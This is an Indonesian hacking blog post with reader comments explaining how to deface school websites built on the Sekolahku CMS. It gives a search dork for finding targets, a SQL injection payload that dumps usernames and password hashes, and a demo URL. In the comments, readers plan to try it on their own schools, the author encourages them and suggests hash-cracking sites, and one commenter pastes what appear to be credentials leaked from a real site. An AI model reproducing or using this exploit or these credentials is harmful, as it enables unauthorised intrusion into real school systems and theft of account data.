Cara Deface CMS Sekolahku

Cara Deface CMS Sekolahku

7:55 AM
Rabbit Security Team

Hai sob ketemu lagi
kali ini admin akan share cara deface nih :v
yap deface cms sekolahku, cms ini menurut mimin cms baru
Langsung aja :)

Dork = "Developed by sekolahku.web.id" ( kembangin )

Exploit = /home/get_agenda_sekolah?end=1'union+select+1,group_concat(0x3c6c693e,username,0x3a,password)+from+users--+

Admin Login = www.site.sch.id/Login

Demo = http://cms.sekolahku.web.id/home/get_agenda_sekolah?end=1%27union+select+1%2Cgroup_concat%280x3c6c693e%2Cusername%2C0x3a%2Cpassword%29+from+users--+

Pokoknya ga beda jauh sama sql lokomedia, selanjutnya kembangin sendiri. cuma hashnya yang kuat, kalo ga bisa hash ya tebak tebakan aja :v

Sekian dari saya :v
nitip Nickname ane :v #Fsociety
Spesial Thanx for #Milio48 :)
Next
« Prev Post
Previous
Next Post »

21 comments

Click here for comments
roiyansite
July 5, 2016 at 8:41 AM ×

nice post bisa dicba di sekolah ane nih :v

Balas
avatar
admin
Unknown
July 5, 2016 at 9:29 AM ×

bisa dicoba ni gan penasaran saya gan

Balas
avatar
admin
Loween
July 9, 2016 at 6:42 PM ×

cara ini cuma work di cms balitbang aja yah? web punya sekolah sekolah di indonesia :D

Balas
avatar
admin
Daffa Hanz
July 9, 2016 at 11:13 PM ×

Haha iya gan ati2 kena omel guru :v

Terima kasih telah berkunjung ^_^

Balas
avatar
admin
Daffa Hanz
July 9, 2016 at 11:14 PM ×

Monggoh gan :D

Terima kasih telah berkunjung ^_^

Balas
avatar
admin
Daffa Hanz
July 9, 2016 at 11:14 PM ×

Ini cms sekolahku gan, bukan cms balitbang :D

Terima kasih telah berkunjung ^_^

Balas
avatar
admin
The One
July 9, 2016 at 11:41 PM ×

Guru disekolah ane killer semua gan. jadi gk berani coba

Balas
avatar
admin
Unknown
July 10, 2016 at 12:22 AM ×

Gak berani dah ane macam macem sama sekolah hahaha

Balas
avatar
admin
Daffa Hanz
July 10, 2016 at 4:22 AM ×

haha gak papa gan, sekali-kali bandel :v

Terima kasih telah berkunjung ^_^

Balas
avatar
admin
Daffa Hanz
July 10, 2016 at 4:22 AM ×

haha iya gan bahaya juga ya

Terima kasih telah berkunjung ^_^

Balas
avatar
admin
Kang Wira
July 10, 2016 at 12:48 PM ×

boleh juga nih.. buat jahil sama guru-guru ... hahha


www.kangwira.com

Balas
avatar
admin
Azhar Azziz
July 10, 2016 at 5:31 PM ×

Sekolah ane develop web sendiri buat web intra net nya gan. Smua data akademik jadinya lbh ke kontrol soalnya bikin sendiri websitenya. Hehe. Untunglah.

Balas
avatar
admin
Algi Fahri
August 4, 2016 at 3:42 PM ×

Itu Hash nya dimana ya bg? gk tau itu hash apaan

Balas
avatar
admin
Daffa Hanz
August 10, 2016 at 5:33 AM ×

ati-ati kena marah gan :v hehe

Balas
avatar
admin
Daffa Hanz
August 10, 2016 at 5:36 AM ×

haha ttap waspada sama para defacer gan :D

Balas
avatar
admin
Daffa Hanz
August 10, 2016 at 5:36 AM ×

bisa di hash di hashkiller.co.uk

Balas
avatar
admin
Design Solutions
August 13, 2016 at 10:10 AM ×

gan bagi link buath hash passwordnya dong, bingung ane kodenya berbentuk $2y$10$QbAe71s2wzvlEdNgzLLnD.C5gYeMvmxlnufb4w\/cyjFgo2c3LJY.C

Balas
avatar
admin
Daffa Hanz
August 20, 2016 at 7:19 AM ×

itu type hash apa gan?
coba di hashonline.com

Balas
avatar
admin
Design Solutions
August 20, 2016 at 11:26 PM ×

udah dicoba ttep gak bisa gan

Balas
avatar
admin
Whdzera
May 14, 2017 at 11:26 PM ×

gk work ,celah sdh di patch sama developer sekolahku .

Balas
avatar
admin
Surya Oka
April 20, 2020 at 7:46 AM ×

[{"title":"1","start":"
administrator:$2y$10$WlzjhqWFRCpUIKKXJO2LH.0D4tlL6oHGAz150DErHdu6q3bRFugtK,
smkmuhpa:$2y$10$.47sNCLMEIwlUv\/.fQTo\/.t7.e2manuke1y6yd4khm6iKxb.QFdH2,
attaossi:attaossi,
admin:$2y$10$CP24QrsEDM0MaEetzmp6s.kaoGAVURQmNYnBCH5DUnNnP90EsRfIm"}]

Tipe apa iniii :v

Balas
avatar
admin
Thanks for your comment
Subscribe to: Post Comments (Atom)